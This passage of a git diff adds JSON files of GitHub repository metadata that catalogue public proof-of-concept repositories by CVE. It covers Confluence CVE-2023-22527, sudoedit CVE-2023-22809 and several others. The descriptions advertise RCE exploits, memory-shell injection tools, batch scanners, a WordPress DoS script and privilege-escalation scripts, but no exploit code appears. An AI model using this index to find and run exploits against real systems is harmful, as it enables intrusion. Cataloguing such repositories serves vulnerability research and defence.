"user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VNCERT-CC\/CVE-2023-22527-confluence", + "description": "[Confluence] CVE-2023-22527 realworld poc", + "fork": false, + "created_at": "2024-01-23T07:10:55Z", + "updated_at": "2024-09-11T08:21:49Z", + "pushed_at": "2024-01-23T07:16:40Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 747075547, + "name": "CVE-2023-22527", + "full_name": "Vozec\/CVE-2023-22527", + "owner": { + "login": "Vozec", + "id": 61807609, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61807609?v=4", + "html_url": "https:\/\/github.com\/Vozec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vozec\/CVE-2023-22527", + "description": "This repository presents a proof-of-concept of CVE-2023-22527", + "fork": false, + "created_at": "2024-01-23T08:06:15Z", + "updated_at": "2024-03-21T17:57:09Z", + "pushed_at": "2024-01-23T09:13:39Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 13, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 747093582, + "name": "CVE-2023-22527", + "full_name": "C1ph3rX13\/CVE-2023-22527", + "owner": { + "login": "C1ph3rX13", + "id": 80873500, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80873500?v=4", + "html_url": "https:\/\/github.com\/C1ph3rX13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/C1ph3rX13\/CVE-2023-22527", + "description": "Atlassian Confluence - Remote Code Execution (CVE-2023-22527)", + "fork": false, + "created_at": "2024-01-23T08:53:46Z", + "updated_at": "2024-02-12T18:35:12Z", + "pushed_at": "2024-01-23T09:04:15Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 747107640, + "name": "CVE-2023-22527", + "full_name": "Niuwoo\/CVE-2023-22527", + "owner": { + "login": "Niuwoo", + "id": 57100441, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57100441?v=4", + "html_url": "https:\/\/github.com\/Niuwoo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Niuwoo\/CVE-2023-22527", + "description": "POC", + "fork": false, + "created_at": "2024-01-23T09:28:53Z", + "updated_at": "2024-01-23T09:58:22Z", + "pushed_at": "2024-01-24T01:28:57Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 747142530, + "name": "CVE-2023-22527", + "full_name": "Chocapikk\/CVE-2023-22527", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-22527", + "description": "Atlassian Confluence - Remote Code Execution", + "fork": false, + "created_at": "2024-01-23T10:55:28Z", + "updated_at": "2024-09-09T08:04:09Z", + "pushed_at": "2024-01-23T11:30:10Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 747304649, + "name": "CVE-2023-22527", + "full_name": "RevoltSecurities\/CVE-2023-22527", + "owner": { + "login": "RevoltSecurities", + "id": 119435129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119435129?v=4", + "html_url": "https:\/\/github.com\/RevoltSecurities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RevoltSecurities\/CVE-2023-22527", + "description": "An Exploitation tool to exploit the confluence server that are vulnerable to CVE-2023-22527 leads to RCE", + "fork": false, + "created_at": "2024-01-23T17:07:15Z", + "updated_at": "2024-03-16T15:29:25Z", + "pushed_at": "2024-01-23T17:18:36Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 747516154, + "name": "CVE-2023-22527", + "full_name": "yoryio\/CVE-2023-22527", + "owner": { + "login": "yoryio", + "id": 134471901, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134471901?v=4", + "html_url": "https:\/\/github.com\/yoryio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yoryio\/CVE-2023-22527", + "description": "Exploit for CVE-2023-22527 - Atlassian Confluence Data Center and Server", + "fork": false, + "created_at": "2024-01-24T04:44:59Z", + "updated_at": "2024-08-12T20:33:10Z", + "pushed_at": "2024-03-15T05:15:05Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "atlassian-confluence", + "cve-2023-22527" + ], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 747900455, + "name": "CVE-2023-22527", + "full_name": "Privia-Security\/CVE-2023-22527", + "owner": { + "login": "Privia-Security", + "id": 69091374, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69091374?v=4", + "html_url": "https:\/\/github.com\/Privia-Security", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Privia-Security\/CVE-2023-22527", + "description": "CVE-2023-22527", + "fork": false, + "created_at": "2024-01-24T21:29:59Z", + "updated_at": "2024-05-10T11:45:23Z", + "pushed_at": "2024-01-25T06:39:02Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 748024139, + "name": "CVE-2023-22527-POC", + "full_name": "MaanVader\/CVE-2023-22527-POC", + "owner": { + "login": "MaanVader", + "id": 103140982, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103140982?v=4", + "html_url": "https:\/\/github.com\/MaanVader", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MaanVader\/CVE-2023-22527-POC", + "description": "Atlassian Confluence Remote Code Execution(RCE) Proof Of Concept", + "fork": false, + "created_at": "2024-01-25T05:32:06Z", + "updated_at": "2024-01-28T09:48:06Z", + "pushed_at": "2024-01-25T10:42:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 748135321, + "name": "CVE-2023-22527", + "full_name": "adminlove520\/CVE-2023-22527", + "owner": { + "login": "adminlove520", + "id": 32920883, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32920883?v=4", + "html_url": "https:\/\/github.com\/adminlove520", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adminlove520\/CVE-2023-22527", + "description": "CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server PoC", + "fork": false, + "created_at": "2024-01-25T10:52:39Z", + "updated_at": "2024-04-02T17:41:19Z", + "pushed_at": "2024-01-25T10:54:57Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 751670668, + "name": "CVE-2023-22527", + "full_name": "YongYe-Security\/CVE-2023-22527", + "owner": { + "login": "YongYe-Security", + "id": 90460865, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90460865?v=4", + "html_url": "https:\/\/github.com\/YongYe-Security", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YongYe-Security\/CVE-2023-22527", + "description": "CVE-2023-22527 Batch scanning", + "fork": false, + "created_at": "2024-02-02T04:20:14Z", + "updated_at": "2024-02-02T04:21:05Z", + "pushed_at": "2024-02-02T04:23:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 755982489, + "name": "CVE-2023-22527-Godzilla-MEMSHELL", + "full_name": "Boogipop\/CVE-2023-22527-Godzilla-MEMSHELL", + "owner": { + "login": "Boogipop", + "id": 114604850, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114604850?v=4", + "html_url": "https:\/\/github.com\/Boogipop", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Boogipop\/CVE-2023-22527-Godzilla-MEMSHELL", + "description": "CVE-2023-22527 内存马注入工具", + "fork": false, + "created_at": "2024-02-11T16:46:55Z", + "updated_at": "2024-10-12T02:06:25Z", + "pushed_at": "2024-02-21T05:49:59Z", + "stargazers_count": 73, + "watchers_count": 73, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 73, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 763294385, + "name": "CVE-2023-22527-MEMSHELL", + "full_name": "M0untainShley\/CVE-2023-22527-MEMSHELL", + "owner": { + "login": "M0untainShley", + "id": 72058581, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72058581?v=4", + "html_url": "https:\/\/github.com\/M0untainShley", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M0untainShley\/CVE-2023-22527-MEMSHELL", + "description": "confluence CVE-2023-22527 漏洞利用工具,支持冰蝎\/哥斯拉内存马注入,支持设置 http 代理", + "fork": false, + "created_at": "2024-02-26T02:34:44Z", + "updated_at": "2024-10-16T10:26:24Z", + "pushed_at": "2024-04-24T02:34:16Z", + "stargazers_count": 37, + "watchers_count": 37, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 37, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 767136230, + "name": "cve-2023-22527", + "full_name": "vulncheck-oss\/cve-2023-22527", + "owner": { + "login": "vulncheck-oss", + "id": 134310220, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134310220?v=4", + "html_url": "https:\/\/github.com\/vulncheck-oss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vulncheck-oss\/cve-2023-22527", + "description": "Three go-exploits exploiting CVE-2023-22527 to execute arbitrary code in memory", + "fork": false, + "created_at": "2024-03-04T19:09:57Z", + "updated_at": "2024-10-31T13:25:33Z", + "pushed_at": "2024-11-25T09:11:38Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 807402056, + "name": "Confluence-RCE", + "full_name": "BBD-YZZ\/Confluence-RCE", + "owner": { + "login": "BBD-YZZ", + "id": 132546612, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132546612?v=4", + "html_url": "https:\/\/github.com\/BBD-YZZ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BBD-YZZ\/Confluence-RCE", + "description": "confluence rce (CVE-2021-26084, CVE-2022-26134, CVE-2023-22527)", + "fork": false, + "created_at": "2024-05-29T03:20:22Z", + "updated_at": "2024-09-22T06:25:09Z", + "pushed_at": "2024-08-26T09:24:31Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 868511070, + "name": "CVE-2023-22527", + "full_name": "kh4sh3i\/CVE-2023-22527", + "owner": { + "login": "kh4sh3i", + "id": 64693844, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64693844?v=4", + "html_url": "https:\/\/github.com\/kh4sh3i", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kh4sh3i\/CVE-2023-22527", + "description": "CVE-2023-22527 | RCE using SSTI in Confluence", + "fork": false, + "created_at": "2024-10-06T15:16:04Z", + "updated_at": "2024-11-09T21:19:35Z", + "pushed_at": "2024-10-08T14:45:46Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 868731394, + "name": "CVE-2023-22527", + "full_name": "AxthonyV\/CVE-2023-22527", + "owner": { + "login": "AxthonyV", + "id": 141282212, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141282212?v=4", + "html_url": "https:\/\/github.com\/AxthonyV", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AxthonyV\/CVE-2023-22527", + "description": "script for exploiting CVE-2023-22527, which is described as a Server-Side Template Injection (SSTI) vulnerability in Atlassian Confluence", + "fork": false, + "created_at": "2024-10-07T04:47:56Z", + "updated_at": "2024-10-07T06:06:01Z", + "pushed_at": "2024-10-07T04:48:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2255.json b/2023/CVE-2023-2255.json new file mode 100644 index 0000000000..7b6e6fa44e --- /dev/null +++ b/2023/CVE-2023-2255.json @@ -0,0 +1,64 @@ +[ + { + "id": 664827690, + "name": "CVE-2023-2255", + "full_name": "elweth-sec\/CVE-2023-2255", + "owner": { + "login": "elweth-sec", + "id": 39616215, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39616215?v=4", + "html_url": "https:\/\/github.com\/elweth-sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/elweth-sec\/CVE-2023-2255", + "description": "CVE-2023-2255 Libre Office ", + "fork": false, + "created_at": "2023-07-10T20:54:56Z", + "updated_at": "2024-11-14T10:26:37Z", + "pushed_at": "2023-07-10T21:00:09Z", + "stargazers_count": 56, + "watchers_count": 56, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 56, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 792716677, + "name": "CVE-2023-2255", + "full_name": "SaintMichae64\/CVE-2023-2255", + "owner": { + "login": "SaintMichae64", + "id": 71401539, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71401539?v=4", + "html_url": "https:\/\/github.com\/SaintMichae64", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SaintMichae64\/CVE-2023-2255", + "description": null, + "fork": false, + "created_at": "2024-04-27T11:21:11Z", + "updated_at": "2024-05-04T10:24:16Z", + "pushed_at": "2024-05-04T10:24:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22551.json b/2023/CVE-2023-22551.json new file mode 100644 index 0000000000..f0fcaab058 --- /dev/null +++ b/2023/CVE-2023-22551.json @@ -0,0 +1,33 @@ +[ + { + "id": 611568639, + "name": "CVE-2023-22551", + "full_name": "viswagb\/CVE-2023-22551", + "owner": { + "login": "viswagb", + "id": 5297466, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5297466?v=4", + "html_url": "https:\/\/github.com\/viswagb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/viswagb\/CVE-2023-22551", + "description": "Reproduce CVE-2023-22551", + "fork": false, + "created_at": "2023-03-09T04:47:37Z", + "updated_at": "2023-03-09T04:47:37Z", + "pushed_at": "2023-03-09T04:47:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22621.json b/2023/CVE-2023-22621.json new file mode 100644 index 0000000000..fece73c44a --- /dev/null +++ b/2023/CVE-2023-22621.json @@ -0,0 +1,33 @@ +[ + { + "id": 632533206, + "name": "CVE-2023-22621-POC", + "full_name": "sofianeelhor\/CVE-2023-22621-POC", + "owner": { + "login": "sofianeelhor", + "id": 43454096, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43454096?v=4", + "html_url": "https:\/\/github.com\/sofianeelhor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sofianeelhor\/CVE-2023-22621-POC", + "description": "CVE-2023-22621: SSTI to RCE by Exploiting Email Templates affecting Strapi Versions <=4.5.5", + "fork": false, + "created_at": "2023-04-25T15:50:05Z", + "updated_at": "2024-03-21T17:50:01Z", + "pushed_at": "2023-04-25T16:25:22Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 22, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22622.json b/2023/CVE-2023-22622.json new file mode 100644 index 0000000000..ae118100c1 --- /dev/null +++ b/2023/CVE-2023-22622.json @@ -0,0 +1,33 @@ +[ + { + "id": 774948865, + "name": "CVE-2023-22622", + "full_name": "michael-david-fry\/CVE-2023-22622", + "owner": { + "login": "michael-david-fry", + "id": 4213469, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4213469?v=4", + "html_url": "https:\/\/github.com\/michael-david-fry", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/michael-david-fry\/CVE-2023-22622", + "description": "Python Script that will DoS a WP server that is utilizing WP-CRON", + "fork": false, + "created_at": "2024-03-20T13:48:48Z", + "updated_at": "2024-08-02T13:26:56Z", + "pushed_at": "2024-08-02T13:26:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22726.json b/2023/CVE-2023-22726.json new file mode 100644 index 0000000000..f3b58f3dee --- /dev/null +++ b/2023/CVE-2023-22726.json @@ -0,0 +1,33 @@ +[ + { + "id": 807560999, + "name": "POC-CVE-2023-22726", + "full_name": "ProxyPog\/POC-CVE-2023-22726", + "owner": { + "login": "ProxyPog", + "id": 73880723, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73880723?v=4", + "html_url": "https:\/\/github.com\/ProxyPog", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ProxyPog\/POC-CVE-2023-22726", + "description": "CVE-2023-22726", + "fork": false, + "created_at": "2024-05-29T10:38:30Z", + "updated_at": "2024-11-11T19:30:31Z", + "pushed_at": "2024-11-11T19:30:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22809.json b/2023/CVE-2023-22809.json new file mode 100644 index 0000000000..107af438c5 --- /dev/null +++ b/2023/CVE-2023-22809.json @@ -0,0 +1,357 @@ +[ + { + "id": 591696201, + "name": "CVE-2023-22809-sudoedit-privesc", + "full_name": "n3m1sys\/CVE-2023-22809-sudoedit-privesc", + "owner": { + "login": "n3m1sys", + "id": 30940342, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30940342?v=4", + "html_url": "https:\/\/github.com\/n3m1sys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n3m1sys\/CVE-2023-22809-sudoedit-privesc", + "description": "A script to automate privilege escalation with CVE-2023-22809 vulnerability", + "fork": false, + "created_at": "2023-01-21T15:19:23Z", + "updated_at": "2024-11-10T14:49:25Z", + "pushed_at": "2023-02-15T18:10:53Z", + "stargazers_count": 148, + "watchers_count": 148, + "has_discussions": false, + "forks_count": 36, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2023-22809", + "exploit", + "privesc", + "script", + "sudo", + "sudoedit", + "vulnerability" + ], + "visibility": "public", + "forks": 36, + "watchers": 148, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 605221519, + "name": "CVE-2023-22809", + "full_name": "M4fiaB0y\/CVE-2023-22809", + "owner": { + "login": "M4fiaB0y", + "id": 95071636, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95071636?v=4", + "html_url": "https:\/\/github.com\/M4fiaB0y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M4fiaB0y\/CVE-2023-22809", + "description": null, + "fork": false, + "created_at": "2023-02-22T17:50:03Z", + "updated_at": "2023-04-21T09:04:44Z", + "pushed_at": "2023-02-22T17:54:37Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 624236850, + "name": "CVE-2023-22809-sudo-POC", + "full_name": "3yujw7njai\/CVE-2023-22809-sudo-POC", + "owner": { + "login": "3yujw7njai", + "id": 7390055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7390055?v=4", + "html_url": "https:\/\/github.com\/3yujw7njai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3yujw7njai\/CVE-2023-22809-sudo-POC", + "description": "CVE-2023-22809 Linux Sudo", + "fork": false, + "created_at": "2023-04-06T03:11:48Z", + "updated_at": "2024-11-17T02:30:25Z", + "pushed_at": "2023-04-06T03:17:33Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 651208036, + "name": "patch_CVE-2023-22809", + "full_name": "hello4r1end\/patch_CVE-2023-22809", + "owner": { + "login": "hello4r1end", + "id": 60706453, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60706453?v=4", + "html_url": "https:\/\/github.com\/hello4r1end", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hello4r1end\/patch_CVE-2023-22809", + "description": null, + "fork": false, + "created_at": "2023-06-08T18:39:44Z", + "updated_at": "2023-06-08T18:47:06Z", + "pushed_at": "2023-06-08T18:47:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 655945165, + "name": "CVE-2023-22809", + "full_name": "Chan9Yan9\/CVE-2023-22809", + "owner": { + "login": "Chan9Yan9", + "id": 67211718, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67211718?v=4", + "html_url": "https:\/\/github.com\/Chan9Yan9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chan9Yan9\/CVE-2023-22809", + "description": "Analysis & Exploit", + "fork": false, + "created_at": "2023-06-20T00:38:08Z", + "updated_at": "2024-10-15T01:08:17Z", + "pushed_at": "2023-06-20T01:31:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 658377223, + "name": "CVE-2023-22809", + "full_name": "pashayogi\/CVE-2023-22809", + "owner": { + "login": "pashayogi", + "id": 50790111, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50790111?v=4", + "html_url": "https:\/\/github.com\/pashayogi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pashayogi\/CVE-2023-22809", + "description": null, + "fork": false, + "created_at": "2023-06-25T15:11:01Z", + "updated_at": "2024-07-16T13:10:27Z", + "pushed_at": "2023-06-25T15:11:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 664513700, + "name": "CVE-2023-22809", + "full_name": "asepsaepdin\/CVE-2023-22809", + "owner": { + "login": "asepsaepdin", + "id": 122620685, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122620685?v=4", + "html_url": "https:\/\/github.com\/asepsaepdin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/asepsaepdin\/CVE-2023-22809", + "description": null, + "fork": false, + "created_at": "2023-07-10T06:38:14Z", + "updated_at": "2024-10-26T17:02:01Z", + "pushed_at": "2023-07-13T06:20:19Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 675212080, + "name": "CVE-2023-22809", + "full_name": "Toothless5143\/CVE-2023-22809", + "owner": { + "login": "Toothless5143", + "id": 81353028, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81353028?v=4", + "html_url": "https:\/\/github.com\/Toothless5143", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Toothless5143\/CVE-2023-22809", + "description": "Running this exploit on a vulnerable system allows a local attacker to gain a root shell on the machine.", + "fork": false, + "created_at": "2023-08-06T06:46:40Z", + "updated_at": "2024-08-07T07:22:23Z", + "pushed_at": "2023-09-03T06:54:49Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-22809", + "exploit", + "sudoedit", + "vulnerability" + ], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 842365089, + "name": "CVE-2023-22809", + "full_name": "AntiVlad\/CVE-2023-22809", + "owner": { + "login": "AntiVlad", + "id": 70754771, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70754771?v=4", + "html_url": "https:\/\/github.com\/AntiVlad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AntiVlad\/CVE-2023-22809", + "description": null, + "fork": false, + "created_at": "2024-08-14T07:48:10Z", + "updated_at": "2024-08-14T07:49:03Z", + "pushed_at": "2024-08-14T07:49:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 847582059, + "name": "SUDO-privilege-escalation", + "full_name": "laxmiyamkolu\/SUDO-privilege-escalation", + "owner": { + "login": "laxmiyamkolu", + "id": 85497904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85497904?v=4", + "html_url": "https:\/\/github.com\/laxmiyamkolu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/laxmiyamkolu\/SUDO-privilege-escalation", + "description": "Sudo Privilege Escalation: CVE-2023-22809 Simulation This project simulates the Sudo privilege escalation vulnerability (CVE-2023-22809) to demonstrate how unauthorized root access can be gained. It involves identifying and exploiting this vulnerability in a controlled environment using Parrot OS, the Sudo command, and Bash scripting.", + "fork": false, + "created_at": "2024-08-26T06:27:59Z", + "updated_at": "2024-08-26T07:09:13Z", + "pushed_at": "2024-08-26T07:09:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + 